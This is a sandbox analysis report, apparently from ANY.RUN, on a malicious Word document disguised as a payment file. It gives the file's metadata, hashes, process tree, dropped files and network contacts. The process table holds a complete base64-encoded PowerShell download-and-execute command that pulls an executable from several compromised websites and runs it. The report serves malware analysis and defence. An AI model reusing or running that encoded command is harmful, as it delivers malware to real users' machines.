File name: | Payment_May_29_18110_84.doc |
Full analysis: | https://app.any.run/tasks/3224a966-48df-4da6-9ba2-2a45081289c1 |
Verdict: | Malicious activity |
Analysis date: | July 18, 2019, 14:16:19 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Soft primary Connecticut, Subject: connect, Author: Kenyon Koch, Comments: Liberian Dollar Cambridgeshire, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed May 29 13:22:00 2019, Last Saved Time/Date: Wed May 29 13:22:00 2019, Number of Pages: 1, Number of Words: 16, Number of Characters: 95, Security: 0 |
MD5: | C360C28B90BBA7068D2550181A3DE275 |
SHA1: | 3F929578758BB884854C911A517C995BA950AB59 |
SHA256: | 72A1203AF230C0172DA591ED68EE319D25F36A771F9AC9E15C375E96B42E12E2 |
SSDEEP: | 1536:NADMeOY5C6OJsdBpZWF+a9M6Ll7ly5UFptrbDhgEdX:C4eOY5CTsdAtnptrxgEdX |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Manager: | White |
---|---|
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 110 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Bailey and Sons |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 95 |
Words: | 16 |
Pages: | 1 |
ModifyDate: | 2019:05:29 12:22:00 |
CreateDate: | 2019:05:29 12:22:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | Liberian Dollar Cambridgeshire |
Keywords: | - |
Author: | Kenyon Koch |
Subject: | connect |
Title: | Soft primary Connecticut |
CompObjUserType: | Microsoft Word 97-2003 Document |
CompObjUserTypeLen: | 32 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2884 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Payment_May_29_18110_84.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3388 | powershell -nop -e JAB3AGIAegBzAGoAUwA9ACcAegA5ADMAUQA3AEUAJwA7ACQAWABvADUAagBmAHoAdgB6ACAAPQAgACcAOAAyADkAJwA7ACQAZgB0AEUAcABjAHUAPQAnAG8AegBoADUAXwBSACcAOwAkAGsAcgBaAFAAegBKADUARQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAWABvADUAagBmAHoAdgB6ACsAJwAuAGUAeABlACcAOwAkAE8AcwBRADUAcwByAGoAWQA9ACcAVwAwAEwAcwB6AHIAJwA7ACQAZgB6ADAAYgBMAE8AdwBqAD0ALgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAJwArACcAdAAnACkAIABOAEUAdAAuAFcAYABFAGAAQgBDAGwAaQBgAGUATgB0ADsAJABzAGgATgBpAGgASQBJAD0AJwBoAHQAdABwADoALwAvAHcAdwB3AC4AYQBuAGQAcgBlAGkAYgBsAGEAagAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AZgB5AGoAZgA0AC8AQABoAHQAdABwADoALwAvAHQAZQBzAHQAcABhAGcAZQAuAHAAYwBvAGQAZQByAC4AbgBlAHQALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ANgB5ADAAMAAvAEAAaAB0AHQAcABzADoALwAvAGMAbwBtAHUAbgBpAGMAYQBhAGcAZQBuAGMAaQBhAC4AYwBvAG0ALwBqAHMALwBuAGUAYwBsAG0AMgA4ADQALwBAAGgAdAB0AHAAOgAvAC8AcQBvAG8AZwBhAHMAbwBmAHQALgBjAG8AbQAvAGcAbgBtADIAaQBuAGMANAA5ADIANwA1AC8AQABoAHQAdABwADoALwAvAHEAdQBvAHYAaQBzAGMAcgBlAGEAdABpAHYAZQAuAGMAbwBtAC8ATABpAG0AaQB0AGUAZAAvAGcAeQAzADUAMwAzADAALwAnAC4AcwBwAGwAaQB0ACgAJwBAACcAKQA7ACQASABFAF8AWABqAHIAZgByAD0AJwBMAFQAXwByAEUAYQBwACcAOwBmAG8AcgBlAGEAYwBoACgAJABsAEMAWgB6AEIAagA2ACAAaQBuACAAJABzAGgATgBpAGgASQBJACkAewB0AHIAeQB7ACQAZgB6ADAAYgBMAE8AdwBqAC4AZABvAFcAbgBMAE8AQQBkAEYAaQBsAEUAKAAkAGwAQwBaAHoAQgBqADYALAAgACQAawByAFoAUAB6AEoANQBFACkAOwAkAHoAYgA3AE0AcQA5AFkAPQAnAHIARQBfADEAUgBVACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAawByAFoAUAB6AEoANQBFACkALgBsAEUAbgBHAFQASAAgAC0AZwBlACAAMgAyADYAMwAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAFQAKAAkAGsAcgBaAFAAegBKADUARQApADsAJAB1AE0AawBaAEEANQBEAEsAPQAnAG0ANQB3AEMAYwBIACcAOwBiAHIAZQBhAGsAOwAkAEwAMwBVAFoASQBYAD0AJwBsAGQAWQBDAHEAagBYAGkAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAegBrAGEAQgBKAGYAPQAnAGkAWgBFAEIAaABzACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA681.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3388 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LJRTNUT99YV9E7T6BLE0.temp | — | |
MD5:— | SHA256:— | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:6D0DB7045A021D5BABEFBCF154BC84B8 | SHA256:F9FE0372E61C911361D5C162855ECABFEE0A499F6598DE881018800A3844AB04 | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F6D0B8AB.wmf | wmf | |
MD5:E536A5D89D75CA19324E9F6A76C12FA0 | SHA256:A70FCADC824F1E8ADE5AD140F22B9E9B986A51828C9D49A5ECA96D77150065CF | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$yment_May_29_18110_84.doc | pgc | |
MD5:34D5A8AFC4BC980BF0ED138DC523D12D | SHA256:62F9F86837D0994989F152B2EA2AE9ADA29A1C7923DE16DE36C60724FEBC547F | |||
3388 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF17b70b.TMP | binary | |
MD5:47388A8B771AD359484FBDBC4C2AF508 | SHA256:710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0 | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:517FBB3C3DEB8D356D0931AB67BE25FD | SHA256:A5FF1DD3FB5CA1835FA28662D5023E12445C7D7345D28E008B6BF5A83BAACB8F | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\113AAAD5.wmf | wmf | |
MD5:1E6D985900CEAD336F35133E491BE145 | SHA256:EC69F79A888BF17C6B01ABCE2F2926DB8A02BC595CDB45E00AC929755A892FE7 | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3E5E5524.wmf | wmf | |
MD5:C4BDDDBF6FFB86DB6658C7123923D418 | SHA256:4BAACF27CB6ABAFF6A906C5E2D9BE59BF35517694D31B621FB04C934607D8162 | |||
3388 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:47388A8B771AD359484FBDBC4C2AF508 | SHA256:710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3388 | powershell.exe | GET | 403 | 77.81.137.216:80 | http://www.andreiblaj.com/wp-includes/fyjf4/ | RO | html | 959 b | unknown |
3388 | powershell.exe | GET | 404 | 45.76.80.179:80 | http://testpage.pcoder.net/wp-content/6y00/ | DE | html | 214 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3388 | powershell.exe | 191.88.129.131:443 | comunicaagencia.com | EPM Telecomunicaciones S.A. E.S.P. | CO | unknown |
3388 | powershell.exe | 45.76.80.179:80 | testpage.pcoder.net | Choopa, LLC | DE | suspicious |
3388 | powershell.exe | 77.81.137.216:80 | www.andreiblaj.com | SimpliQ Tech SRL | RO | unknown |
Domain | IP | Reputation |
---|---|---|
www.andreiblaj.com |
| unknown |
testpage.pcoder.net |
| suspicious |
comunicaagencia.com |
| unknown |